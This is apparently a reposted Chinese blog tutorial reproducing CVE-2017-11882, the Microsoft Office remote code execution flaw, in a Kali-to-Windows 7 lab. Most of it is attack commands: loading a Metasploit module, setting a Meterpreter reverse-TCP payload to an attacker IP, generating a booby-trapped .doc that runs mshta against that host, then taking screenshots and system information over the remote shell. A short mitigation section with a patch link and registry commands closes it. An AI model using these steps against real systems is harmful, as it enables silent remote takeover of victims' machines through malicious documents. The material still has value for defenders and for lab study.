CVE-2017-11882复现及编写脚本实现自动化

栏目: 编程工具 · 发布时间: 5年前

内容简介:2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。Office 365Mi

前言

2017年11月14日,微软发布了11月份的安全补丁更新,其中比较引人关注的莫过于悄然修复了潜伏17年之久的Office远程代码执行漏洞(CVE-2017-11882)。该漏洞为Office内存破坏漏洞,影响目前流行的所有Office版本。攻击者可以利用漏洞以当前登录的用户的身份执行任意命令。 由于漏洞影响面较广,漏洞披露后,金睛安全研究团队持续对漏洞相关攻击事件进行关注。11月19日,监控到了已有漏洞POC在网上流传,随即迅速对相关样本进行了分析。目前该样本全球仅微软杀毒可以检测。

漏洞影响版本:

Office 365

Microsoft Office 2000

Microsoft Office 2003

Microsoft Office 2007 Service Pack 3

Microsoft Office 2010 Service Pack 2

Microsoft Office 2013 Service Pack 1

Microsoft Office 2016

攻击机:kali Linux 2017.03

攻击机IP:192.168.137.130

靶机:win7

含有漏洞的Office版本:Office 2016

利用复现过程

下载安装office 2016:直接上msdn.itellyou.cn下载,安装在靶机上

种子链接:

ed2k://|file|cn_office_professional_plus_2016_x86_x64_dvd_6969182.iso|2588266496|27EEA4FE4BB13CD0ECCDFC24167F9E01|/

下载POC代码到渗透机(用此验证漏洞的存在)

https://pan.baidu.com/s/1jeiN1pm78Jh-sMS3gmlXyg 提取码:m6gjo

下载rb文件到渗透机

https://pan.baidu.com/s/15nURrik3Sk5FXXd8Motx4w 提取码:t1hz

这里都下载到桌面CVE-2017-11882文件夹

在Kali上构造带有 shell 后门的word文件,并开启监听:

将CVE-2017-11882.rb拷贝到metasploit目录中,这里拷贝到目录/usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:~# cd /usr/share/metasploit-framework/modules/exploits/windows/smb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# cp ~/Desktop/CVE-2017-11882/CVE-2017-11882.rb CVE-2017-11882.rb

root@kali:/usr/share/metasploit-framework/modules/exploits/windows/smb# ls

CVE-2017-11882复现及编写脚本实现自动化

进入Metasploit框架,搜索CVE-2017-11882:

root@kali:~# msfconsole

msf > search CVE-2017-11882

CVE-2017-11882复现及编写脚本实现自动化

使用CVE-2017-11882.rb模块,开启Meterpreter监听会话:

使用模块:msf > use exploit/windows/smb/CVE-2017-11882

设置tcp反弹对话:msf exploit(CVE-217-11882) > set payload windows/meterpreter/reverse_tcp

设置渗透机ip地址(这里通过ifconfig命令查看):

CVE-2017-11882复现及编写脚本实现自动化

msf exploit(CVE-2017-11882) > set lhost 192.168.137.130

设置路径为11882:msf exploit(CVE-2017-11882) > set uripath 11882

开启渗透,进入监听状态:

msf exploit(CVE-2017-11882) > exploit

使用CVE-2017-11882.py模块,生成带有shell的doc文件:

root@Kali:~/Desktop/CVE-2017-11882/# python CVE-2017-11882.py -c "mshta http://192.168.137.130:8080 " -o 11882-3.doc

此时,CVE-2017-11882目录中增加了另外一个word文件11882-3,而此文件的功能是:打开它的电脑会反弹shell会话到控制机,将11882-3.doc拷贝到靶机win7上

在Win7打开11882-3.doc文件,此时观察Win7靶机和Kali Linux渗透机:

CVE-2017-11882复现及编写脚本实现自动化

当靶机打开文件时,整个过程没有任何弹框,也没有其他异常动作。

此时,在另一段的Kali Linux渗透机,已经获取到shell会话:

CVE-2017-11882复现及编写脚本实现自动化

通过命令sessions查看meterpreter会话:

msf exploit(CVE-2017-11882) > sessions

CVE-2017-11882复现及编写脚本实现自动化

此后便可以通过meterpreter来对会话进行管理:

进入会话:msf exploit(CVE-2017-11882) > sessions 1

查看系统信息:meterpreter > sysinfo

查看当前用户:meterpreter > getuid

截屏:meterpreter > screenshot

CVE-2017-11882复现及编写脚本实现自动化 CVE-2017-11882复现及编写脚本实现自动化

可以看到,安装了最新office 2016版本的win7,因为CVE-2017-11882漏洞,当打开带有shell后门的doc文件时,kali渗透机可以获取到完美的后门并控制win7。

漏洞修复

1.下载微软对此漏洞补丁:

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 并且开启自动更新功能

2.在注册表中禁用该漏洞模块

reg add "HKLM\SOFTWARE\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD /d 0x400

reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Office\XX.X\Common\COM Compatibility{0002CE02-0000-0000-C000-000000000046}" /v "Compatibility Flags" /t REG_DWORD/d 0x400


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

精通Spring 4.x

精通Spring 4.x

陈雄华、林开雄、文建国 / 电子工业出版社 / 2017-1-1 / CNY 128.00

Spring 4.0是Spring在积蓄4年后,隆重推出的一个重大升级版本,进一步加强了Spring作为Java领域第一开源平台的翘楚地位。Spring 4.0引入了众多Java开发者翘首以盼的基于Groovy Bean的配置、HTML 5/WebSocket支持等新功能,全面支持Java 8.0,最低要求是Java 6.0。这些新功能实用性强、易用性高,可大幅降低Java应用,特别是Java W......一起来看看 《精通Spring 4.x》 这本书的介绍吧!

图片转BASE64编码
图片转BASE64编码

在线图片转Base64编码工具

MD5 加密
MD5 加密

MD5 加密工具